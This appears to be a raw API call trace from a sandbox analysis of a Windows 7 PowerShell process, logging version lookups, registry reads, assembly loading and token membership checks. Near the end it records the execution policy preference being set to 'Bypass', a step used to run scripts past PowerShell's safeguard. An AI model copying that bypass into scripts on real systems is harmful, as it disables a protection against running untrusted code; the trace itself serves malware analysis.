	[0103.348] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb7088, puLen=0x1ade90) returned 1
	[0103.348] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0103.348] CoTaskMemAlloc (cb=0x20) returned 0x2ae930
	[0103.348] lstrcpyW (in: lpString1=0x2ae930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0103.348] CoTaskMemFree (pv=0x2ae930) 
	[0103.348] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb70c8, puLen=0x1ade90) returned 1
	[0103.348] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0103.348] CoTaskMemAlloc (cb=0x44) returned 0x2b5210
	[0103.348] lstrcpyW (in: lpString1=0x2b5210, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0103.348] CoTaskMemFree (pv=0x2b5210) 
	[0103.348] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb7130, puLen=0x1ade90) returned 1
	[0103.348] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0103.348] CoTaskMemAlloc (cb=0x76) returned 0x244360
	[0103.348] lstrcpyW (in: lpString1=0x244360, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0103.348] CoTaskMemFree (pv=0x244360) 
	[0103.348] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb71cc, puLen=0x1ade90) returned 1
	[0103.348] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0103.348] CoTaskMemAlloc (cb=0x44) returned 0x2b5210
	[0103.348] lstrcpyW (in: lpString1=0x2b5210, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0103.348] CoTaskMemFree (pv=0x2b5210) 
	[0103.348] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb7230, puLen=0x1ade90) returned 1
	[0103.348] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0103.348] CoTaskMemAlloc (cb=0x58) returned 0x20a270
	[0103.348] lstrcpyW (in: lpString1=0x20a270, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0103.349] CoTaskMemFree (pv=0x20a270) 
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb72ac, puLen=0x1ade90) returned 1
	[0103.349] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0103.349] CoTaskMemAlloc (cb=0x20) returned 0x2ae930
	[0103.349] lstrcpyW (in: lpString1=0x2ae930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0103.349] CoTaskMemFree (pv=0x2ae930) 
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb6f54, puLen=0x1ade90) returned 1
	[0103.349] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0103.349] CoTaskMemAlloc (cb=0x66) returned 0x2adbf0
	[0103.349] lstrcpyW (in: lpString1=0x2adbf0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0103.349] CoTaskMemFree (pv=0x2adbf0) 
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x0, puLen=0x1ade90) returned 0
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x0, puLen=0x1ade90) returned 0
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x0, puLen=0x1ade90) returned 0
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ade68, puLen=0x1ade60 | out: lplpBuffer=0x1ade68*=0x2bb6efc, puLen=0x1ade60) returned 1
	[0103.349] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0103.349] VerLanguageNameW (in: wLang=0x0, szLang=0x256de0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0103.349] CoTaskMemFree (pv=0x256de0) 
	[0103.349] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x2bb6e88, puLen=0x1adeb0) returned 1
	[0103.359] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1add88 | out: phkResult=0x1add88*=0x304) returned 0x0
	[0103.362] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1add4c, lpData=0x0, lpcbData=0x1add48*=0x0 | out: lpType=0x1add4c*=0x1, lpData=0x0, lpcbData=0x1add48*=0x56) returned 0x0
	[0103.362] CoTaskMemAlloc (cb=0x5a) returned 0x2adb80
	[0103.362] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1add1c, lpData=0x2adb80, lpcbData=0x1add18*=0x56 | out: lpType=0x1add1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1add18*=0x56) returned 0x0
	[0103.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.664] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0103.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.664] CoTaskMemFree (pv=0x204160) 
	[0104.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0104.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0104.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0105.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0105.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0105.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0105.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0105.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0106.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0106.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0106.665] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0106.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0106.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0106.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0106.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ada60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0107.331] SetErrorMode (uMode=0x1) returned 0x1
	[0107.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1adce0 | out: lpFileInformation=0x1adce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0107.331] SetErrorMode (uMode=0x1) returned 0x1
	[0109.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.285] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0109.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.285] CoTaskMemFree (pv=0x204490) 
	[0109.851] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0109.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.851] CoTaskMemFree (pv=0x204490) 
	[0109.851] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0109.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.851] CoTaskMemFree (pv=0x204490) 
	[0109.854] CoCreateGuid (in: pguid=0x1ae0a8 | out: pguid=0x1ae0a8*(Data1=0x3fe7a76, Data2=0x2ee9, Data3=0x45a6, Data4=([0]=0xa9, [1]=0x5b, [2]=0xa, [3]=0x7d, [4]=0x1, [5]=0x9d, [6]=0x4d, [7]=0x2b))) returned 0x0
	[0109.857] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0109.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.857] CoTaskMemFree (pv=0x204490) 
	[0109.859] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0109.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.859] CoTaskMemFree (pv=0x204490) 
	[0109.861] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0109.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.862] CoTaskMemFree (pv=0x204490) 
	[0109.867] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0109.869] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1add50 | out: lpConsoleScreenBufferInfo=0x1add50) returned 1
	[0109.873] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0109.874] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1add50 | out: lpConsoleScreenBufferInfo=0x1add50) returned 1
	[0109.875] GetVersionExW (in: lpVersionInformation=0x1adce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0109.877] GetCurrentProcess () returned 0xffffffffffffffff
	[0109.878] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1add78 | out: TokenHandle=0x1add78*=0x320) returned 1
	[0109.881] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adc98 | out: TokenInformation=0x0, ReturnLength=0x1adc98) returned 0
	[0109.882] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2138c0
	[0109.882] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2138c0, TokenInformationLength=0x4, ReturnLength=0x1adc98 | out: TokenInformation=0x2138c0, ReturnLength=0x1adc98) returned 1
	[0109.884] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1addf8 | out: phNewToken=0x1addf8*=0x31c) returned 1
	[0109.885] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adc98 | out: TokenInformation=0x0, ReturnLength=0x1adc98) returned 0
	[0109.886] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2138f0
	[0109.886] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2138f0, TokenInformationLength=0x4, ReturnLength=0x1adc98 | out: TokenInformation=0x2138f0, ReturnLength=0x1adc98) returned 1
	[0109.887] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2c91c08*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ade08 | out: IsMember=0x1ade08) returned 1
	[0109.887] CloseHandle (hObject=0x31c) returned 1
	[0112.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0112.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.689] GetConsoleWindow () returned 0x1401b2
	[0136.698] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0137.052] CoTaskMemAlloc (cb=0x104) returned 0x204490
